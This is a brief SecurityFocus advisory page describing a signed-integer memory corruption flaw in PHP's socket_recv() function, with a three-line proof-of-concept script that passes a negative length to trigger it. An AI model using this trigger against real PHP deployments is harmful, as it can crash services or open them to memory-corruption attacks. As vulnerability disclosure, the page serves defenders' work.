info
discussion
exploit
solution
references
PHP socket_recv() Signed Integer Memory Corruption Vulnerability
The following proof of concept was provided:
<?php
$buf = "";
socket_recv(socket_create(AF_INET, SOCK_STREAM, 0), $buf, -3, 0);
?>
Privacy Statement
Copyright 2010, SecurityFocus
